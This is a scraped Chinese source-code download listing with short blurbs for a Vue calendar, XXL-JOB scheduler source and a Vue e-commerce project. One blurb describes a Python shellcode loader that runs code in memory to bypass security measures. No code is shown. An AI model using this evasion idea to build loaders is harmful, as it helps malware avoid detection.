该项目为基于TypeScript和Vue构建的日历展示与日程条创建设计源码,包含33个文件,涉及10个TypeScript文件、5个JSON文件、4个LESS样式文件、3个Vue组件文件、2个JavaScript和SVG文件,以及HTML、Git忽略和Markdown文档等。该系统具备日历查看和日程条创建功能,适用于个人或团队日程管理需求。
基于Java语言实现的XXL-JOB分布式定时任务设计源码注释
09-28
该项目为XXL-JOB分布式定时任务系统设计源码,采用Java语言开发,辅以JavaScript和CSS进行界面设计。项目文件总计288个,其中Java源文件133个,PNG图片文件35个,JavaScript文件35个,XML配置文件16个,CSS样式文件12个,FTL模板文件11个,属性文件6个,Markdown文件3个,JPG图片文件3个,EOT字体文件3个。源码注释详尽,旨在提升代码可读性和维护性。
基于Vue框架的邻家优选电商平台设计源码
09-28
该项目是一款采用Vue框架开发的邻家优选电商平台设计源码,包含共计48个文件,涵盖17个Vue组件文件、10个JavaScript脚本文件、8个JPG图片文件、4个JSON配置文件、4个PNG图片文件,以及必要的配置文件和图标文件。该系统由Ipang组设计,旨在提供一站式购物体验。
python shellcode加载
09-19
Python shellcode 加载器是一个程序,它能够从字节串中动态地加载和执行二进制代码。这种技术通常用于绕过安全措施,因为它可以避免将可疑代码写入硬盘驱动器或在文件中进行存储,而是将其保存在内存中直接执行。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值